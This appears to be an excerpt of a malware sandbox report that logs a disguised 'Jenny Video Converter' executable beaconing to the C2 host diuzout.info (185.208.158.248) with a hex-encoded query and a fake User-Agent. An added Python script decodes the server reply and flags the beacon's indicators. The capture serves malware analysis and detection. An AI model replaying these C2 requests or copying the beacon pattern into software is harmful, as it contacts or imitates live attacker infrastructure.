    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:30.171807051 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:30.417841911 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 63204 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:30.548974991 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:31.234381914 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:31.343579054 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:31.579183102 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.663205185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:31.709356070 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:32.416250944 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.663206185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:32.537874937 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:33.254429102 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.663207185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:33.515901089 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:34.223546982 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.663208185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:34.348021984 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:35.056972027 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.663209185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:35.176713943 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:35.885575056 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.663210185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:36.005148888 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:36.696521997 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.663211185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:36.816704988 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:37.500720024 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:37.607845068 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:37.843919992 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.663213185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:37.976284981 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:38.666539907 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.663214185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:38.785413980 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:39.488457918 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.663215185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:39.613168955 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:40.324258089 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:40.436297894 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:40.675502062 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.663216185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:40.802942991 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:41.513390064 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:41.623820066 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:41.860819101 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.663217185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:42.021609068 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:42.705235958 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


Session ID: 53 | Source: 192.168.2.6:63218 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:42.832653046 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:43.540287971 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
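The sessions in this report all carry the same request, fired roughly once a second, and the server always answers with the same short chunked body. As an added example (not part of the Joe Sandbox report and not code from the sample or its C2), the Python below decodes the reply body listed under Data Raw and scores the three indicators a detection engineer would pull from these sessions: a User-Agent advertising a Windows NT version that does not exist, an opaque hex blob in the q= parameter, and a tight, regular request cadence. The host, path, User-Agent, raw body and timestamps are copied from the report; the thresholds and the list of Windows NT version strings are assumptions made for the example.

```python
"""Added example (not Joe Sandbox code): decode the C2 reply body and score the
beacon pattern visible in the report's HTTP sessions. Inputs are copied from the
report or constructed for illustration; thresholds are assumptions."""
import re
import statistics
from datetime import datetime
from typing import Dict, List, Tuple

# --- inputs taken from the report -------------------------------------------------
HOST = "diuzout.info"
PATH = ("/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344"
        "815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e9"
        "6cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511")
USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
# "Data Raw" of the 200 OK reply, exactly as listed in the report.
RAW_CHUNKED = bytes.fromhex(
    "65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a".replace(" ", ""))
# Outbound GET timestamps from sessions 53 to 58 (the same request every time).
BEACON_TIMES = [
    "Oct 8, 2024 04:14:42.832653046 CEST", "Oct 8, 2024 04:14:43.660598993 CEST",
    "Oct 8, 2024 04:14:44.542836905 CEST", "Oct 8, 2024 04:14:45.342981100 CEST",
    "Oct 8, 2024 04:14:45.708553076 CEST", "Oct 8, 2024 04:14:46.514856100 CEST",
    "Oct 8, 2024 04:14:46.879548073 CEST", "Oct 8, 2024 04:14:47.710681915 CEST",
]
REQUESTS = [{"ts": t, "host": HOST, "path": PATH, "ua": USER_AGENT} for t in BEACON_TIMES]

# --- chunked body decoder ----------------------------------------------------------
def decode_chunked(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: repeated <hex-size>CRLF<data>CRLF, ended by a
    zero-size chunk. The report's "Data Ascii" line shows framing and payload run
    together; this returns only the payload bytes."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0].decode("ascii"), 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2

# --- beacon indicators -------------------------------------------------------------
# Assumption: allowlist of NT version strings that real Windows releases report.
KNOWN_NT_VERSIONS = {"4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}

def parse_ts(s: str) -> float:
    """'Oct 8, 2024 04:14:42.832653046 CEST' -> seconds since epoch (nanoseconds kept;
    the zone is ignored because only differences between stamps are used)."""
    m = re.fullmatch(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CEST", s)
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    frac = int(m.group(2).ljust(9, "0")[:9]) / 1e9
    return (base - datetime(1970, 1, 1)).total_seconds() + frac

def ua_indicators(ua: str) -> List[str]:
    """A User-Agent naming an NT version no Windows build ever reported is a fake UA."""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m and m.group(1) not in KNOWN_NT_VERSIONS:
        return [f"User-Agent claims non-existent Windows NT {m.group(1)}"]
    return []

def query_indicators(path: str, min_hex: int = 128) -> List[str]:
    """Flag an opaque hex blob in q= (assumed threshold: 128 hex chars = 64 bytes)."""
    m = re.search(r"[?&]q=([0-9a-fA-F]+)(?:&|$)", path)
    if m and len(m.group(1)) >= min_hex:
        return [f"opaque hex payload in q= ({len(m.group(1))} hex chars)"]
    return []

def cadence_indicators(stamps: List[float], min_count: int = 5,
                       max_median_gap: float = 2.0) -> List[str]:
    """Flag many identical requests sent at a short, regular interval (assumed thresholds)."""
    if len(stamps) < min_count:
        return []
    ts = sorted(stamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    med = statistics.median(gaps)
    if med <= max_median_gap:
        return [f"{len(ts)} identical requests, median gap {med:.2f}s"]
    return []

def analyze(requests: List[dict]) -> Dict[str, List[str]]:
    """Group requests by (host, path, UA) and return indicators keyed by 'host/path'."""
    groups: Dict[Tuple[str, str, str], List[float]] = {}
    for r in requests:
        groups.setdefault((r["host"], r["path"], r["ua"]), []).append(parse_ts(r["ts"]))
    report: Dict[str, List[str]] = {}
    for (host, path, ua), stamps in groups.items():
        hits = ua_indicators(ua) + query_indicators(path) + cadence_indicators(stamps)
        if hits:
            report[host + path.split("?", 1)[0]] = hits
    return report

if __name__ == "__main__":
    print("C2 reply payload:", decode_chunked(RAW_CHUNKED))
    for key, hits in analyze(REQUESTS).items():
        print(key)
        for h in hits:
            print("  -", h)
```

Decoding the body yields the 14-byte string 67b680813008c2; the report's Data Ascii line e67b680813008c20 is those same bytes with the chunk-size line (e) and the terminating 0 chunk run together, not a 16-character payload. What the payload means (task id, acknowledgement, or something else) is not something the capture alone tells you, and the report does not document the protocol, so the script flags the traffic shape rather than guessing at content.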


Session ID: 54 | Source: 192.168.2.6:63219 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:43.660598993 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:44.377959967 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 55 | Source: 192.168.2.6:63220 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:44.542836905 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:45.232326984 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
